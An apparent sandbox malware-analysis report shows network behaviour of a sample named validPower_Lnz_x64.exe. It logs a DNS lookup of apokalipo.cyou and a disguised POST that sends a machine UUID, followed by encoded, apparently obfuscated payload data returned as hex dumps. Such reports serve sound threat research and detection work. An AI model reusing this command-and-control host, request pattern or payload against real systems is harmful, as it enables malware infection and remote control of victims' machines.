GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
                                                          RPCRT4.dllUuidCreate

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2024 07:14:56.255572081 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.255620003 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:56.255692005 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.256922960 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.256937981 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:56.725415945 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:56.725647926 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.731344938 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.731374025 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:56.731812954 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:56.781053066 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.786292076 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.786325932 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:56.786413908 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.185745955 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.185822010 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.185856104 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.185883045 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.185883999 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.185909986 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.185923100 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.185935020 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.185965061 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.185980082 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.186248064 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.186280012 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.186290026 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.186321974 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.186374903 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.190468073 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.234174013 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.234220028 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273104906 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273166895 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.273175001 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273188114 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273236990 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.273240089 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273251057 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273313999 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.273332119 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273889065 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273926020 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273940086 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.273955107 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274008036 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.274482012 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274547100 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274585962 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274594069 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.274605989 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274655104 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.274868965 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275243044 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275280952 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275286913 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.275300026 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275352001 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.275363922 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275933027 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275964975 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275980949 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.275993109 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276053905 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276070118 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276103020 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276154041 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276237011 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276237011 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.276273966 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.276297092 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.328130007 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.328170061 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.328233004 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.328514099 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.328526020 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.789344072 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.789400101 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.792057991 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.792066097 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.792428017 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.793534040 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.793562889 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.793566942 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.108139992 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.108270884 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.108314037 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.111330032 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.111351013 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.111365080 CEST49740443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.111370087 CEST44349740188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.222433090 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.222496033 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.222575903 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.223175049 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.223193884 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.682810068 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.682879925 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.684161901 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.684175968 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.684601068 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.687969923 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.688031912 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.688038111 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.981493950 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.981565952 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.981776953 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.982177019 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.982227087 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:58.982258081 CEST49741443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:58.982273102 CEST44349741188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.349595070 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.349632978 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.349726915 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.350963116 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.350984097 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.838856936 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.838957071 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.840073109 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.840086937 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.840420961 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:41.890172958 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.902566910 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.902590990 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:41.902690887 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250319004 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250377893 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250415087 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250421047 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250454903 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250494957 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250497103 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250508070 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250540018 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250715971 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250773907 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250806093 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250806093 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.250817060 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.250850916 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.251497984 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.296416998 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.296449900 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342439890 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342478991 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342508078 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342516899 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342556000 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342603922 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342662096 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342703104 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342709064 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342803955 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.342840910 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.342848063 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343542099 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343580961 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343589067 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.343595028 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.343633890 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.343640089 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344335079 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344372988 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344374895 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.344383001 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.344432116 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.344436884 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345163107 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345196009 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.345201015 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345210075 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345247984 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.345253944 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345294952 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345362902 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.345367908 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345412016 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.345634937 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.346299887 CEST49973443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.346317053 CEST44349973188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.402796984 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.402832985 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.402892113 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.403179884 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.403189898 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.869723082 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.869808912 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.871571064 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.871577024 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.871905088 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:42.872596025 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.872628927 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:42.872632027 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173012972 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173130989 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173381090 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:43.173440933 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:43.173456907 CEST44349979188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:15:43.173470974 CEST49979443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:15:43.173477888 CEST44349979188.114.96.3192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2024 07:14:56.228621006 CEST5113953192.168.2.41.1.1.1
                                                          Oct 7, 2024 07:14:56.251200914 CEST53511391.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 7, 2024 07:14:56.228621006 CEST192.168.2.41.1.1.10x7500Standard query (0)apokalipo.cyouA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 7, 2024 07:14:56.251200914 CEST1.1.1.1192.168.2.40x7500No error (0)apokalipo.cyou188.114.96.3A (IP address)IN (0x0001)false
                                                          Oct 7, 2024 07:14:56.251200914 CEST1.1.1.1192.168.2.40x7500No error (0)apokalipo.cyou188.114.97.3A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • apokalipo.cyou

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449739188.114.96.3443344C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-07 05:14:56 UTC367OUTPOST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          Content-Length: 96
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:14:56 UTC96OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 2d 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                          2024-10-07 05:14:57 UTC570INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Oct 2024 05:14:57 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          op: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rCeXhY3XTz3Btayob4MNB79Z9ACbwtl792beGcVq8SfwyD%2FYiNYiXskEBr0Iw9Nz3wxwO0dw3do63v6Vp4QIGnYMXWsyNFuEIG9TAwNTiUYOagGG41mNtKcKEbvCgqodKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb6919389b32f4-EWR
                                                          2024-10-07 05:14:57 UTC17INData Raw: 63 0d 0a c5 5a 00 00 00 00 00 00 00 00 00 00 0d 0a
                                                          Data Ascii: cZ
                                                          2024-10-07 05:14:57 UTC1369INData Raw: 33 37 64 32 0d 0a 40 69 69 27 14 00 60 08 27 00 21 07 08 bb bb 21 07 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5e 69 6d 60 5a 42 4f 50 7a 62 6f 7a 65 69 7b 69 7e 22 68 50 7c 6d 7f 7f 7b 63 7e 68 7f 22 69 62 6f 61 6d 7f 78 69 7e 14 00 7f 09 34 00 ef 08 08 bb bb ef 08 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 63 61 22 60 65 6e 69 7e 78 75 22 66 6d 74 74 50 45 62 68 69 74 69 68 48 4e 50 6a 65 60 69 53 53 3c 22 65 62 68 69 74 69 68 68 6e 22 60 69 7a 69 60 68 6e 14 00 e4 09 07 00 28 00 08 bb bb 28 00 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4f 59 5e 5e 49 42 58 10 00 fa 07 04 00 d4 0a 04 d4 d4 d4 0a 3f 42 0d 1d 19 1d 0c ce de 45 da c5 09 bc 5a 10 00 db 02 04 00 88 00 04 d4 d4 88 00 88 42 0d 1d 19 1d 0c 04 fc 2f de 0f 2b d6 5e 10 00 85 01 04 00 21
                                                          Data Ascii: 37d2@ii'`'!!BC{^im`ZBOPzbozei{i~"hP|m{c~h"iboamxi~4OBC{oca"`eni~xu"fmttPEbhitihHNPje`iSS<"ebhitihhn"`izi`hn((BC{OY^^IBX?BEZB/+^!
                                                          2024-10-07 05:14:57 UTC1369INData Raw: 5b 65 62 5a 42 4f 38 14 00 64 00 08 00 76 03 08 ba ba 76 03 4f 42 0d 1d 19 1d 0c 48 a9 8a c2 19 10 49 37 31 79 71 0c 40 61 e9 58 10 00 fe 01 04 00 56 0a 04 d4 d4 56 0a f6 42 0d 1d 19 1d 0c 55 da 48 7a 5e 0d b1 fa 14 00 a1 01 05 00 9e 0a 08 bb bb 9e 0a 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 60 63 6b 10 00 6d 03 04 00 45 09 04 d4 d4 45 09 0b 42 0d 1d 19 1d 0c 46 d6 86 5f 4c 05 7f df 10 00 bb 04 04 00 95 0b 04 d4 d4 95 0b 4f 42 0d 1d 19 1d 0c 78 dc 93 fa 73 0b 6a 7a 14 00 dd 01 08 00 7a 03 08 bb bb 7a 03 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5b 69 6e 2c 48 6d 78 6d 14 00 3e 04 0c 00 67 09 08 bb bb 67 09 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 79 60 78 7e 6d 7a 62 6f 22 65 62 65 10 00 a5 09 04 00 11 09 04 d4 d4 11 09 2c 42 0d 1d 19 1d
                                                          Data Ascii: [ebZBO8dvvOBHI71yq@aXVVBUHz^BC{&"`ckmEEBF_LOBxsjzzzBC{[in,Hmxm>ggBC{y`x~mzbo"ebe,B
                                                          2024-10-07 05:14:57 UTC1369INData Raw: ee 03 9a 99 c4 68 65 7f 6f 63 7e 68 68 69 7a 69 60 63 7c 61 69 62 78 50 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 50 60 69 7a 69 60 68 6e 10 00 34 04 04 00 4a 09 04 d4 d4 4a 09 3f 42 0d 1d 19 1d 0c bd ed 00 92 b6 3a f9 12 14 00 d5 08 11 00 ba 00 08 bb bb ba 00 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 64 7e 63 61 65 79 61 53 6e 7e 63 7b 7f 69 7e 7f 14 00 9a 0a 15 00 b2 0b 08 bb bb b2 0b 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7f 64 63 7e 78 6f 79 78 7f 21 6f 79 7f 78 63 61 22 66 7f 63 62 10 00 cb 09 04 00 73 08 04 d4 d4 73 08 4f 42 0d 1d 19 1d 0c b6 d6 8f fe bd 01 76 7e 14 00 13 04 09 00 4c 06 08 bb bb 4c 06 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 41 4d 42 45 4a 49 5f 58 26 14 00 6e 08 06 00 b3 0a 08 bb bb b3 0a f6 42 0d 1d 19 1d 0c b0 43 7b
                                                          Data Ascii: heoc~hhizi`c|aibxP@com`,_xc~mkiP`izi`hn4JJ?B:BC{od~caeyaSn~c{i~BC{dc~xoyx!oyxca"fcbssOBv~LLBC{AMBEJI_X&nBC{
                                                          2024-10-07 05:14:57 UTC1369INData Raw: d4 56 04 67 42 0d 1d 19 1d 0c 2a 72 1f 06 21 a5 e6 86 10 00 16 07 04 00 5b 04 04 d4 d4 5b 04 0b 42 0d 1d 19 1d 0c 18 76 bf bc 18 a1 46 3c 14 00 eb 05 04 00 36 08 08 bb bb 36 08 2c 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 63 7c 69 62 14 00 b0 01 08 00 10 00 08 ba ba 10 00 4f 42 0d 1d 19 1d 0c f0 84 e7 0b 9d 8d f7 7e 89 54 1c c5 c4 fc 57 11 10 00 37 06 04 00 e3 02 04 d4 d4 e3 02 0b 42 0d 1d 19 1d 0c db 8c 3a 9d d0 5b c3 1d 14 00 7e 02 11 00 02 00 08 bb bb 02 00 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 64 7e 63 61 65 79 61 53 6e 7e 63 7b 7f 69 7e 7f 14 00 da 03 0c 00 62 08 08 bb bb 62 08 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 68 65 7f 6f 63 7e 68 26 22 69 74 69 14 00 b4 01 08 00 03 02 08 ba ba 03 02 f6 42 0d 1d 19 1d 0c ef 2d 39 3e 90 bb b2 5a
                                                          Data Ascii: VgB*r![[BvF<66,BC{c|ibOB~TW7B:[~BC{od~caeyaSn~c{i~bbBC{heoc~h&"itiB-9>Z
                                                          2024-10-07 05:14:57 UTC1369INData Raw: 38 3d 3f 3f 3c 3a 35 3c 35 34 34 3c 3c 3a 38 14 00 1a 08 02 00 2c 06 08 bb bb 2c 06 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 68 6e 14 00 95 0a 08 00 28 07 08 bb bb 28 07 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7c 7e 63 6a 65 60 69 7f 14 00 ef 0a 09 00 d8 04 08 bb bb d8 04 3f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5f 78 69 6d 61 5c 6d 78 64 14 00 91 0b 08 00 e5 04 08 ba ba e5 04 2c 42 0d 1d 19 1d 0c a0 be 23 9b 2e 02 9a 1d d9 6e d8 55 77 73 3a 72 10 00 4a 00 04 00 76 00 04 d4 d4 76 00 88 42 0d 1d 19 1d 0c 0d d4 6a 5b 06 03 93 db 10 00 65 07 04 00 49 02 04 d4 d4 49 02 88 42 0d 1d 19 1d 0c 80 f5 15 d4 8a c3 19 51 14 00 58 02 10 00 54 00 08 bb bb 54 00 2b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5f 43 4a 58 5b 4d 5e 49 50 43 7c 69 62 5a 5c 42 14
                                                          Data Ascii: 8=??<:5<544<<:8,,OBC{hn((BC{|~cje`i?BC{_xima\mxd,B#.nUws:rJvvBj[eIIBQXTT+BC{_CJX[M^IPC|ibZ\B
